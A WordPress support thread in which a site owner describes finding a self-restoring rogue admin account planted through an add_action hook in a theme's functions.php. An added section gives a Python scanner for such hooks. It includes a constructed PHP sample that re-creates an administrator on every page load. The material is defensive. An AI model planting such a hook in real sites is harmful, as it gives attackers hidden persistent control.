[Resolved] Hacker placed admin action within functions.php



    Just to let you guys know, I was stupid enough to grant access to my dev site during lockdown to a plugin developer I’d trusted before on a previous project. Yesterday for some reason I thought to check the user member status and realised there was an additional admin I didn’t recognise. I went to delete the user but it re-appeared about 2 minutes later. I did some online research and checked the user table within the wp db via phpMyAdmin. Sure enough there was the same admin I’d just deleted. I tried changing the email and then deleting but it re-appeared again after 2 minutes. I then thought to change the user role and remove all privileges while I investigated further. This held. I also installed the iThemes Security plugin on the recommendation of a WordPress support article. I managed to block all access to the dev site apart from myself and this also appeared to work as I then started to notice multiple failed login attempts (I now have 350 Brute Force attempts and IPs logged).

    I then thought to download all WordPress files and perform a text search for this user’s details and bingo! I found an add action entry placed at the bottom of the GeneratePress main theme’s functions.php. Once removed I managed to permanently delete the admin in question.

    Thought to share this experience just in case anyone else experiences the same problem.
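
The text search described in the post above, generalized into a small scanner (an added example, not part of the original thread or of any plugin's code): it flags WordPress account and role calls in PHP source and ties each one to the add_action hook that triggers its enclosing function. The sample file, function name and username are constructed for illustration.

```python
import re
from pathlib import Path

# WordPress core calls that create accounts or change roles/capabilities.
ACCOUNT_CALL = re.compile(
    r"\b(wp_create_user|wp_insert_user|wp_update_user|set_role|add_cap)\s*\(")
FUNC_DEF = re.compile(r"\bfunction\s+(\w+)\s*\(")
HOOK = re.compile(
    r"\badd_action\s*\(\s*['\"]([^'\"]+)['\"]\s*,\s*['\"](\w+)['\"]")

# Constructed sample input: an account-recreating hook at the end of a file.
SAMPLE = """<?php
function example_restore_account() {
    if ( ! username_exists( 'example_user' ) ) {
        $id = wp_create_user( 'example_user', 'PLACEHOLDER', 'user@example.invalid' );
        ( new WP_User( $id ) )->set_role( 'administrator' );
    }
}
add_action( 'init', 'example_restore_account' );
"""

def scan_php(source, needle=None):
    """Flag account/role calls and lines containing needle (case-insensitive).
    'function' is the last named function defined above the line (a text
    heuristic, not a PHP parser); 'hooks' lists add_action hooks that name it.
    """
    hooks, findings, current = {}, [], None
    for no, line in enumerate(source.splitlines(), 1):
        if (m := FUNC_DEF.search(line)):
            current = m.group(1)
        for m in HOOK.finditer(line):
            hooks.setdefault(m.group(2), []).append(m.group(1))
        call = ACCOUNT_CALL.search(line)
        if call or (needle and needle.lower() in line.lower()):
            findings.append({"line": no, "function": current,
                             "call": call.group(1) if call else None})
    # Hooks are usually registered after the function, so resolve them last.
    for f in findings:
        f["hooks"] = hooks.get(f["function"], [])
    return findings

def scan_tree(root, needle=None):
    """Scan every .php file under root; return {path: findings} for hits only."""
    results = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php(path.read_text(encoding="utf-8", errors="replace"), needle)
        if hits:
            results[str(path)] = hits
    return results
```

Run scan_tree over a downloaded copy of the site with the unfamiliar username or e-mail as the needle. Legitimate plugins also call these functions, so each hit in a theme or plugin file needs reading by hand.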

    Customer Support

    Hi there,

    That’s a shady thing to do.

    Glad you’ve got it figured out!
